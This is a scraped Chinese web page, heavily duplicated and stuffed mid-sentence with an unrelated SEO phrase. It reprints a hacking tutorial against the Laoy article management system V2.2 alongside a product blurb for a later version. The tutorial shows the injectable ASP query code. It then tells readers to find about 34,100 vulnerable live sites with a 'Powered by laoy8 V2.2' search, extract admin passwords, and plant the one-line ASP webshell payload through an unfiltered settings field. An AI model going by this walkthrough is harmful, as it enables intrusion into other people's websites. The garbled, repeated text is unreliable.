asp
网络***实战:老Y文章管理系统V2.2注入漏洞剖析与借助
站长必读 • 优采云 发表了文章 • 0 个评论 • 201 次浏览 • 2020-07-15 08:02
网络***实战:老Y文章管理系统V2.2注入漏洞剖析与借助
安天365团队
同学说使我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网路,在他人的基础上进行更改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间实惠嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以起码也得检测下安全性,总不能三天两头使人更改数据。
(一)前期剖析
由于该套系统是ASP+ACCESS,可能对于我们来说就有好多的限制,不象MSSQL,MYSQL有那么多的扩充和内置函数使用,其实象这种asp,php,jsp的动态网站注入,很大一方面是须要对各类数据库的了解,你了解的越深***的技巧就越多,说偏了,还是来瞧瞧我们的站,首先步入官方网站看看:,随便点个,并在前面加了个冒号,提示说参数不合法,被过滤了,本想注册个用户再瞧瞧,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步剖析。
(二)漏洞剖析
由于代码不是好多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里似乎完全可以只搜索富含关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
省略N多
相信你们都能明白吧老y文章管理系统采集功能怎么设置分页,id变量只是单纯的过滤了单引号就带入进了数据库,很明显形成了注入,简单剖析下代码的意思,然后来构造自己的 注入句子 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放在注入工具就可以得到管理员用户名和密码,当然也可以用我给你们提供的工具,直接曝出管理员信息,然后把密码领到去破解,接下来的事就简单。
(三)网络实战
1.通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶快去网路战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
下载 (36.15 KB)
23秒前
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期打算工作
由于上面的好多网站已被提权,大家还是尽量选稍稍靠后的网站进行测试,我用自己的空间来尝试,直接用工具曝出用户名和密码登录后台,可是发觉数据库备份被删了,这可怎样办,突然想到因为配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现不仅ad1,ad2,ad3没有过滤老y文章管理系统采集功能怎么设置分页,其他的参数因为过滤了双引号,那么我们就借助ad1参数来进行本地递交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
下载 (35.41 KB)
22秒前
图2 创造“有利条件”
3.获取Webshell
将递交地址改为,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击递交,提示更改成功,然后用客户端联接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
下载 (51.48 KB)
20秒前
(四)总结感受
本文没有哪些深奥的技术,在这里只是想提醒你们在没有数据库备份的情况下,我们可以借助配置信息来插入一句话***,希望对你们平常***网站时有点帮助,上面提及的网站已在第一时间补上,大家不用再去测试了,如果你们发觉了其他的漏洞,也请高人你手下留情,别在我网站上提权,在此感谢了。我的笔名
OVEGN,欢迎你们到安天365峰会()与我交流。 查看全部
安天365团队
同学说使我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网路,在他人的基础上进行更改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间实惠嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以起码也得检测下安全性,总不能三天两头使人更改数据。
(一)前期剖析
由于该套系统是ASP+ACCESS,可能对于我们来说就有好多的限制,不象MSSQL,MYSQL有那么多的扩充和内置函数使用,其实象这种asp,php,jsp的动态网站注入,很大一方面是须要对各类数据库的了解,你了解的越深***的技巧就越多,说偏了,还是来瞧瞧我们的站,首先步入官方网站看看:,随便点个,并在前面加了个冒号,提示说参数不合法,被过滤了,本想注册个用户再瞧瞧,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步剖析。
(二)漏洞剖析
由于代码不是好多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里似乎完全可以只搜索富含关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
省略N多
相信你们都能明白吧老y文章管理系统采集功能怎么设置分页,id变量只是单纯的过滤了单引号就带入进了数据库,很明显形成了注入,简单剖析下代码的意思,然后来构造自己的 注入句子 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放在注入工具就可以得到管理员用户名和密码,当然也可以用我给你们提供的工具,直接曝出管理员信息,然后把密码领到去破解,接下来的事就简单。
(三)网络实战
1.通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶快去网路战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
下载 (36.15 KB)
23秒前
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期打算工作
由于上面的好多网站已被提权,大家还是尽量选稍稍靠后的网站进行测试,我用自己的空间来尝试,直接用工具曝出用户名和密码登录后台,可是发觉数据库备份被删了,这可怎样办,突然想到因为配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现不仅ad1,ad2,ad3没有过滤老y文章管理系统采集功能怎么设置分页,其他的参数因为过滤了双引号,那么我们就借助ad1参数来进行本地递交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
下载 (35.41 KB)
22秒前
图2 创造“有利条件”
3.获取Webshell
将递交地址改为,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击递交,提示更改成功,然后用客户端联接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
下载 (51.48 KB)
20秒前
(四)总结感受
本文没有哪些深奥的技术,在这里只是想提醒你们在没有数据库备份的情况下,我们可以借助配置信息来插入一句话***,希望对你们平常***网站时有点帮助,上面提及的网站已在第一时间补上,大家不用再去测试了,如果你们发觉了其他的漏洞,也请高人你手下留情,别在我网站上提权,在此感谢了。我的笔名
OVEGN,欢迎你们到安天365峰会()与我交流。 查看全部
网络***实战:老Y文章管理系统V2.2注入漏洞剖析与借助
安天365团队
同学说使我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网路,在他人的基础上进行更改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间实惠嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以起码也得检测下安全性,总不能三天两头使人更改数据。
(一)前期剖析
由于该套系统是ASP+ACCESS,可能对于我们来说就有好多的限制,不象MSSQL,MYSQL有那么多的扩充和内置函数使用,其实象这种asp,php,jsp的动态网站注入,很大一方面是须要对各类数据库的了解,你了解的越深***的技巧就越多,说偏了,还是来瞧瞧我们的站,首先步入官方网站看看:,随便点个,并在前面加了个冒号,提示说参数不合法,被过滤了,本想注册个用户再瞧瞧,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步剖析。
(二)漏洞剖析
由于代码不是好多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里似乎完全可以只搜索富含关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
省略N多
相信你们都能明白吧老y文章管理系统采集功能怎么设置分页,id变量只是单纯的过滤了单引号就带入进了数据库,很明显形成了注入,简单剖析下代码的意思,然后来构造自己的 注入句子 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放在注入工具就可以得到管理员用户名和密码,当然也可以用我给你们提供的工具,直接曝出管理员信息,然后把密码领到去破解,接下来的事就简单。
(三)网络实战
1.通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶快去网路战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
下载 (36.15 KB)
23秒前
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期打算工作
由于上面的好多网站已被提权,大家还是尽量选稍稍靠后的网站进行测试,我用自己的空间来尝试,直接用工具曝出用户名和密码登录后台,可是发觉数据库备份被删了,这可怎样办,突然想到因为配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现不仅ad1,ad2,ad3没有过滤老y文章管理系统采集功能怎么设置分页,其他的参数因为过滤了双引号,那么我们就借助ad1参数来进行本地递交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
下载 (35.41 KB)
22秒前
图2 创造“有利条件”
3.获取Webshell
将递交地址改为,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击递交,提示更改成功,然后用客户端联接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
下载 (51.48 KB)
20秒前
(四)总结感受
本文没有哪些深奥的技术,在这里只是想提醒你们在没有数据库备份的情况下,我们可以借助配置信息来插入一句话***,希望对你们平常***网站时有点帮助,上面提及的网站已在第一时间补上,大家不用再去测试了,如果你们发觉了其他的漏洞,也请高人你手下留情,别在我网站上提权,在此感谢了。我的笔名
OVEGN,欢迎你们到安天365峰会()与我交流。
asp 老Y文章管理系统 v4.06 bulid20171012
站长必读 • 优采云 发表了文章 • 0 个评论 • 258 次浏览 • 2020-07-14 08:00
老y文章管理系统是由老y基于Asp+Access/Mssql环境下开发的开源建站产品。在很大程度上满足了中级个人用户及企业、事业单位、团体、机构等的建站需求。不需要网站操作者会复杂的程序代码,只须要轻点键盘能够建设功能齐全的专业级网站!是中级建站首选。会员组、QQ用户登入、投票调查、评论、广告系统等功能,加强网站的互动性的同时也可为网站的发展带来一定的赢利模式。
本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种形式浏览。
老y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何侧门老y文章管理系统采集功能怎么设置分页,严格的代码过滤为网站的安全运行提供了可靠的保障。
商业版功能改动说明:
1、采用SQL数据库时前台及后台文章列表采用分页储存过程,速度提高更显著;
2、增加自定义单页面功能。比如网站底部显示的网站介绍、关于我们、联系方法等。并能设置是否显示在网站底部及排列次序,可选择不同的模板文件。设置的单页面直接生成静态html文件。
3、留言本强化版各版块可设置权限,允许某用户组步入。
4、增加手机版浏览;
老y文章管理系统 更新日志:
2017-10-12更新:
修复新用户难以注册问题;
修改编辑器上的插入视频按键老y文章管理系统采集功能怎么设置分页,插入视频可直接点击视频按键插入,需要的可下载新版把kindeditor目录覆盖即可。 查看全部
本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种形式浏览。
老y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何侧门老y文章管理系统采集功能怎么设置分页,严格的代码过滤为网站的安全运行提供了可靠的保障。
商业版功能改动说明:
1、采用SQL数据库时前台及后台文章列表采用分页储存过程,速度提高更显著;
2、增加自定义单页面功能。比如网站底部显示的网站介绍、关于我们、联系方法等。并能设置是否显示在网站底部及排列次序,可选择不同的模板文件。设置的单页面直接生成静态html文件。
3、留言本强化版各版块可设置权限,允许某用户组步入。
4、增加手机版浏览;
老y文章管理系统 更新日志:
2017-10-12更新:
修复新用户难以注册问题;
修改编辑器上的插入视频按键老y文章管理系统采集功能怎么设置分页,插入视频可直接点击视频按键插入,需要的可下载新版把kindeditor目录覆盖即可。 查看全部
老y文章管理系统是由老y基于Asp+Access/Mssql环境下开发的开源建站产品。在很大程度上满足了中级个人用户及企业、事业单位、团体、机构等的建站需求。不需要网站操作者会复杂的程序代码,只须要轻点键盘能够建设功能齐全的专业级网站!是中级建站首选。会员组、QQ用户登入、投票调查、评论、广告系统等功能,加强网站的互动性的同时也可为网站的发展带来一定的赢利模式。
本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种形式浏览。
老y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何侧门老y文章管理系统采集功能怎么设置分页,严格的代码过滤为网站的安全运行提供了可靠的保障。
商业版功能改动说明:
1、采用SQL数据库时前台及后台文章列表采用分页储存过程,速度提高更显著;
2、增加自定义单页面功能。比如网站底部显示的网站介绍、关于我们、联系方法等。并能设置是否显示在网站底部及排列次序,可选择不同的模板文件。设置的单页面直接生成静态html文件。
3、留言本强化版各版块可设置权限,允许某用户组步入。
4、增加手机版浏览;
老y文章管理系统 更新日志:
2017-10-12更新:
修复新用户难以注册问题;
修改编辑器上的插入视频按键老y文章管理系统采集功能怎么设置分页,插入视频可直接点击视频按键插入,需要的可下载新版把kindeditor目录覆盖即可。
网络***实战:老Y文章管理系统V2.2注入漏洞剖析与借助
站长必读 • 优采云 发表了文章 • 0 个评论 • 201 次浏览 • 2020-07-15 08:02
网络***实战:老Y文章管理系统V2.2注入漏洞剖析与借助
安天365团队
同学说使我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网路,在他人的基础上进行更改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间实惠嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以起码也得检测下安全性,总不能三天两头使人更改数据。
(一)前期剖析
由于该套系统是ASP+ACCESS,可能对于我们来说就有好多的限制,不象MSSQL,MYSQL有那么多的扩充和内置函数使用,其实象这种asp,php,jsp的动态网站注入,很大一方面是须要对各类数据库的了解,你了解的越深***的技巧就越多,说偏了,还是来瞧瞧我们的站,首先步入官方网站看看:,随便点个,并在前面加了个冒号,提示说参数不合法,被过滤了,本想注册个用户再瞧瞧,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步剖析。
(二)漏洞剖析
由于代码不是好多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里似乎完全可以只搜索富含关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
省略N多
相信你们都能明白吧老y文章管理系统采集功能怎么设置分页,id变量只是单纯的过滤了单引号就带入进了数据库,很明显形成了注入,简单剖析下代码的意思,然后来构造自己的 注入句子 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放在注入工具就可以得到管理员用户名和密码,当然也可以用我给你们提供的工具,直接曝出管理员信息,然后把密码领到去破解,接下来的事就简单。
(三)网络实战
1.通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶快去网路战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
下载 (36.15 KB)
23秒前
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期打算工作
由于上面的好多网站已被提权,大家还是尽量选稍稍靠后的网站进行测试,我用自己的空间来尝试,直接用工具曝出用户名和密码登录后台,可是发觉数据库备份被删了,这可怎样办,突然想到因为配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现不仅ad1,ad2,ad3没有过滤老y文章管理系统采集功能怎么设置分页,其他的参数因为过滤了双引号,那么我们就借助ad1参数来进行本地递交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
下载 (35.41 KB)
22秒前
图2 创造“有利条件”
3.获取Webshell
将递交地址改为,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击递交,提示更改成功,然后用客户端联接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
下载 (51.48 KB)
20秒前
(四)总结感受
本文没有哪些深奥的技术,在这里只是想提醒你们在没有数据库备份的情况下,我们可以借助配置信息来插入一句话***,希望对你们平常***网站时有点帮助,上面提及的网站已在第一时间补上,大家不用再去测试了,如果你们发觉了其他的漏洞,也请高人你手下留情,别在我网站上提权,在此感谢了。我的笔名
OVEGN,欢迎你们到安天365峰会()与我交流。 查看全部
安天365团队
同学说使我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网路,在他人的基础上进行更改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间实惠嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以起码也得检测下安全性,总不能三天两头使人更改数据。
(一)前期剖析
由于该套系统是ASP+ACCESS,可能对于我们来说就有好多的限制,不象MSSQL,MYSQL有那么多的扩充和内置函数使用,其实象这种asp,php,jsp的动态网站注入,很大一方面是须要对各类数据库的了解,你了解的越深***的技巧就越多,说偏了,还是来瞧瞧我们的站,首先步入官方网站看看:,随便点个,并在前面加了个冒号,提示说参数不合法,被过滤了,本想注册个用户再瞧瞧,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步剖析。
(二)漏洞剖析
由于代码不是好多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里似乎完全可以只搜索富含关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
省略N多
相信你们都能明白吧老y文章管理系统采集功能怎么设置分页,id变量只是单纯的过滤了单引号就带入进了数据库,很明显形成了注入,简单剖析下代码的意思,然后来构造自己的 注入句子 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放在注入工具就可以得到管理员用户名和密码,当然也可以用我给你们提供的工具,直接曝出管理员信息,然后把密码领到去破解,接下来的事就简单。
(三)网络实战
1.通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶快去网路战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
下载 (36.15 KB)
23秒前
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期打算工作
由于上面的好多网站已被提权,大家还是尽量选稍稍靠后的网站进行测试,我用自己的空间来尝试,直接用工具曝出用户名和密码登录后台,可是发觉数据库备份被删了,这可怎样办,突然想到因为配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现不仅ad1,ad2,ad3没有过滤老y文章管理系统采集功能怎么设置分页,其他的参数因为过滤了双引号,那么我们就借助ad1参数来进行本地递交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
下载 (35.41 KB)
22秒前
图2 创造“有利条件”
3.获取Webshell
将递交地址改为,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击递交,提示更改成功,然后用客户端联接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
下载 (51.48 KB)
20秒前
(四)总结感受
本文没有哪些深奥的技术,在这里只是想提醒你们在没有数据库备份的情况下,我们可以借助配置信息来插入一句话***,希望对你们平常***网站时有点帮助,上面提及的网站已在第一时间补上,大家不用再去测试了,如果你们发觉了其他的漏洞,也请高人你手下留情,别在我网站上提权,在此感谢了。我的笔名
OVEGN,欢迎你们到安天365峰会()与我交流。 查看全部
网络***实战:老Y文章管理系统V2.2注入漏洞剖析与借助
安天365团队
同学说使我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网路,在他人的基础上进行更改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间实惠嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以起码也得检测下安全性,总不能三天两头使人更改数据。
(一)前期剖析
由于该套系统是ASP+ACCESS,可能对于我们来说就有好多的限制,不象MSSQL,MYSQL有那么多的扩充和内置函数使用,其实象这种asp,php,jsp的动态网站注入,很大一方面是须要对各类数据库的了解,你了解的越深***的技巧就越多,说偏了,还是来瞧瞧我们的站,首先步入官方网站看看:,随便点个,并在前面加了个冒号,提示说参数不合法,被过滤了,本想注册个用户再瞧瞧,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步剖析。
(二)漏洞剖析
由于代码不是好多,我们就来依次剖析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里似乎完全可以只搜索富含关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
set rs=server.createobject("adodb.recordset")
sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
rs.open sql,conn,1,1
省略N多
相信你们都能明白吧老y文章管理系统采集功能怎么设置分页,id变量只是单纯的过滤了单引号就带入进了数据库,很明显形成了注入,简单剖析下代码的意思,然后来构造自己的 注入句子 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放在注入工具就可以得到管理员用户名和密码,当然也可以用我给你们提供的工具,直接曝出管理员信息,然后把密码领到去破解,接下来的事就简单。
(三)网络实战
1.通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶快去网路战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
下载 (36.15 KB)
23秒前
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期打算工作
由于上面的好多网站已被提权,大家还是尽量选稍稍靠后的网站进行测试,我用自己的空间来尝试,直接用工具曝出用户名和密码登录后台,可是发觉数据库备份被删了,这可怎样办,突然想到因为配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现不仅ad1,ad2,ad3没有过滤老y文章管理系统采集功能怎么设置分页,其他的参数因为过滤了双引号,那么我们就借助ad1参数来进行本地递交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
下载 (35.41 KB)
22秒前
图2 创造“有利条件”
3.获取Webshell
将递交地址改为,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击递交,提示更改成功,然后用客户端联接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
下载 (51.48 KB)
20秒前
(四)总结感受
本文没有哪些深奥的技术,在这里只是想提醒你们在没有数据库备份的情况下,我们可以借助配置信息来插入一句话***,希望对你们平常***网站时有点帮助,上面提及的网站已在第一时间补上,大家不用再去测试了,如果你们发觉了其他的漏洞,也请高人你手下留情,别在我网站上提权,在此感谢了。我的笔名
OVEGN,欢迎你们到安天365峰会()与我交流。
asp 老Y文章管理系统 v4.06 bulid20171012
站长必读 • 优采云 发表了文章 • 0 个评论 • 258 次浏览 • 2020-07-14 08:00
老y文章管理系统是由老y基于Asp+Access/Mssql环境下开发的开源建站产品。在很大程度上满足了中级个人用户及企业、事业单位、团体、机构等的建站需求。不需要网站操作者会复杂的程序代码,只须要轻点键盘能够建设功能齐全的专业级网站!是中级建站首选。会员组、QQ用户登入、投票调查、评论、广告系统等功能,加强网站的互动性的同时也可为网站的发展带来一定的赢利模式。
本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种形式浏览。
老y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何侧门老y文章管理系统采集功能怎么设置分页,严格的代码过滤为网站的安全运行提供了可靠的保障。
商业版功能改动说明:
1、采用SQL数据库时前台及后台文章列表采用分页储存过程,速度提高更显著;
2、增加自定义单页面功能。比如网站底部显示的网站介绍、关于我们、联系方法等。并能设置是否显示在网站底部及排列次序,可选择不同的模板文件。设置的单页面直接生成静态html文件。
3、留言本强化版各版块可设置权限,允许某用户组步入。
4、增加手机版浏览;
老y文章管理系统 更新日志:
2017-10-12更新:
修复新用户难以注册问题;
修改编辑器上的插入视频按键老y文章管理系统采集功能怎么设置分页,插入视频可直接点击视频按键插入,需要的可下载新版把kindeditor目录覆盖即可。 查看全部
本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种形式浏览。
老y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何侧门老y文章管理系统采集功能怎么设置分页,严格的代码过滤为网站的安全运行提供了可靠的保障。
商业版功能改动说明:
1、采用SQL数据库时前台及后台文章列表采用分页储存过程,速度提高更显著;
2、增加自定义单页面功能。比如网站底部显示的网站介绍、关于我们、联系方法等。并能设置是否显示在网站底部及排列次序,可选择不同的模板文件。设置的单页面直接生成静态html文件。
3、留言本强化版各版块可设置权限,允许某用户组步入。
4、增加手机版浏览;
老y文章管理系统 更新日志:
2017-10-12更新:
修复新用户难以注册问题;
修改编辑器上的插入视频按键老y文章管理系统采集功能怎么设置分页,插入视频可直接点击视频按键插入,需要的可下载新版把kindeditor目录覆盖即可。 查看全部
老y文章管理系统是由老y基于Asp+Access/Mssql环境下开发的开源建站产品。在很大程度上满足了中级个人用户及企业、事业单位、团体、机构等的建站需求。不需要网站操作者会复杂的程序代码,只须要轻点键盘能够建设功能齐全的专业级网站!是中级建站首选。会员组、QQ用户登入、投票调查、评论、广告系统等功能,加强网站的互动性的同时也可为网站的发展带来一定的赢利模式。
本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种形式浏览。
老y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何侧门老y文章管理系统采集功能怎么设置分页,严格的代码过滤为网站的安全运行提供了可靠的保障。
商业版功能改动说明:
1、采用SQL数据库时前台及后台文章列表采用分页储存过程,速度提高更显著;
2、增加自定义单页面功能。比如网站底部显示的网站介绍、关于我们、联系方法等。并能设置是否显示在网站底部及排列次序,可选择不同的模板文件。设置的单页面直接生成静态html文件。
3、留言本强化版各版块可设置权限,允许某用户组步入。
4、增加手机版浏览;
老y文章管理系统 更新日志:
2017-10-12更新:
修复新用户难以注册问题;
修改编辑器上的插入视频按键老y文章管理系统采集功能怎么设置分页,插入视频可直接点击视频按键插入,需要的可下载新版把kindeditor目录覆盖即可。
